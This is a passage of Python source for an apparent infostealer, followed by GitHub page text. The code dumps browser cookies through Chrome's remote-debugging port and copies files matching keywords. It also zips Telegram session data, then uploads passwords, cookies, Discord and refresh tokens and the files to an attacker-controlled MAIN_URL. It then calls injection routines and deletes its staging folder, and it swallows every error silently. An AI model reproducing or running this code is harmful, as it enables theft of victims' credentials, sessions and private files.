"email": token_data["email"],\n "phone": phone_number})\n TOKENCOUNT = TOKENCOUNT+1\n except:\n pass\n\n\nfor browser in CHROME_PATHS:\n if os.path.exists(browser["path"]):\n try:\n taskkill(browser["taskname"])\n strtcmd = f\'"{browser["exepath"]}" --headless --remote-debugging-port=9222 --remote-allow-origins=* --user-data-dir="{browser["path"]}"\'\n subprocess.Popen(strtcmd, creationflags=subprocess.CREATE_NEW_CONSOLE, close_fds=True)\n targets = requests.get("http://localhost:9222/json").json()\n ws_url = targets[0]["webSocketDebuggerUrl"]\n ws = websocket.create_connection(ws_url)\n payload = {\n "id": 1,\n "method": "Network.getAllCookies"\n }\n ws.send(json.dumps(payload))\n cookie_str = ""\n for cookie in json.loads(ws.recv())["result"]["cookies"]:\n cookie_str += f"{cookie[\'domain\']}\\tTRUE\\t/\\tFALSE\\t13355861278849698\\t{cookie[\'name\']}\\t{cookie[\'value\']}\\n"\n COOKIECOUNT = COOKIECOUNT+1\n COOKIES.append({"browser": browser["name"], "profile": "Default", "cookies": base64.b64encode(cookie_str.encode()).decode()})\n ws.close()\n taskkill(browser["taskname"])\n except: pass\n\nfor path in PATHS_TO_SEARCH:\n for root, _, files in os.walk(path):\n for file_name in files:\n for keyword in FILE_KEYWORDS:\n if keyword in file_name.lower():\n for extension in ALLOWED_EXTENSIONS:\n if file_name.endswith(extension):\n try:\n realpath = os.path.join(root, file_name)\n if os.path.isfile(realpath):\n shutil.copy(realpath, STORAGE_PATH)\n else:\n zip_to_storage(realpath, STORAGE_PATH)\n except:\n pass\n\ndef telegram():\n try:\n kill_process("Telegram.exe")\n except:\n pass\n source_path = os.path.join(APPDATA, "Telegram Desktop", "tdata")\n \n if os.path.exists(source_path):\n zip_to_storage("tdata_session", source_path, STORAGE_PATH)\n\ntry:\n telegram()\nexcept:\n pass\n\ndef create_log():\n for i in range(10):\n payload = {\n "passwordcount": len(PASSWORDS),\n "cookiecount": COOKIECOUNT,\n "discordtokencount": len(DISCORD_TOKENS),\n "filenames": FILES,\n }\n headers = {"X-User-Identifier": userid, "Content-Type": "application/json"}\n\n try:\n r = requests.post(MAIN_URL + "/create_log", json=payload, headers=headers)\n if r.status_code == 200:\n return r.json()["log_uuid"]\n else:\n continue\n except:\n continue\n\n return ""\n\ndef upload_data(loguuid):\n payload = {\n "passwords": PASSWORDS,\n "cookies": COOKIES,\n "discord_tokens": DISCORD_TOKENS,\n "refresh_tokens": WEB_DATA\n }\n headers = {"X-Trace-ID": loguuid, "Content-Type": "application/json"}\n requests.post(MAIN_URL + "/log_data", json=payload, headers=headers)\n\ndef upload_files(filepath, loguuid):\n url = MAIN_URL + "/log_files"\n\n files = {\'file\': open(filepath, \'rb\')}\n headers = {"X-Trace-ID": loguuid}\n requests.post(url, files=files, headers = headers)\n\nfor file_to_upload in os.listdir(STORAGE_PATH):\n FILES.append(file_to_upload)\n\ntry:\n loguuid = create_log()\n upload_data(loguuid)\n for file_to_upload in os.listdir(STORAGE_PATH):\n upload_files(os.path.join(STORAGE_PATH, file_to_upload), loguuid)\nexcept: pass\n\nfor i in range(2):\n try:\n inject(loguuid)\n inject_atomic(loguuid)\n break\n except: pass\n\ntry:\n os.removedirs(STORAGE_PATH)\nexcept: pass' |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment